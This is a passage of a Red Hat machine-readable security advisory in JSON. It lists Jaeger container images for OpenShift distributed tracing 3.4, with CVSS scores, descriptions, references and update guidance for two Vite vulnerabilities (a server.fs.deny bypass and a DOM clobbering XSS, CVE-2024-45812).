3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "vite: server.fs.deny is bypassed when using `?import\u0026raw`" }, { "cve": "CVE-2024-45812", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-17T20:20:07.064245+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2312935" } ], "notes": [ { "category": "description", "text": "A DOM clobbering vulnerability was found in ViteJS. This may lead to cross-site scripting (XSS) attacks on websites that include Vite-bundled files configured with an output format of cjs, iife, or umd, and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.", "title": "Vulnerability description" }, { "category": "summary", "text": "vite: XSS via DOM Clobbering gadget found in vite bundled scripts", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue is classified as moderate severity rather than important due to the specific conditions required to exploit the vulnerability. While DOM Clobbering can lead to Cross-Site Scripting (XSS), the attack surface is relatively limited. Exploitation is contingent on the presence of unsanitized user-supplied HTML with certain scriptless attributes (`name`, `id`) and the use of particular Vite build outputs (`cjs`, `iife`, `umd`). In environments following proper input sanitization practices, the risk is significantly mitigated. Moreover, the vulnerability does not enable direct code injection or compromise by default but rather leverages existing script elements, reducing the likelihood of widespread exploitation compared to higher severity issues.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45812" }, { "category": "external", "summary": "RHBZ#2312935", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312935" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45812", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45812" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45812", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45812" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad", "url": "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad" }, { "category": "external", "summary": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3", "url": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3" }, { "category": "external", "summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", "url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986" }, { "category": "external", "summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering", "url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering" }, { "category": "external", "summary": "https://scnps.co/papers/sp23_domclob.pdf", "url": "https://scnps.co/papers/sp23_domclob.pdf" } ], "release_date": "2024-09-17T20:15:06.037000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 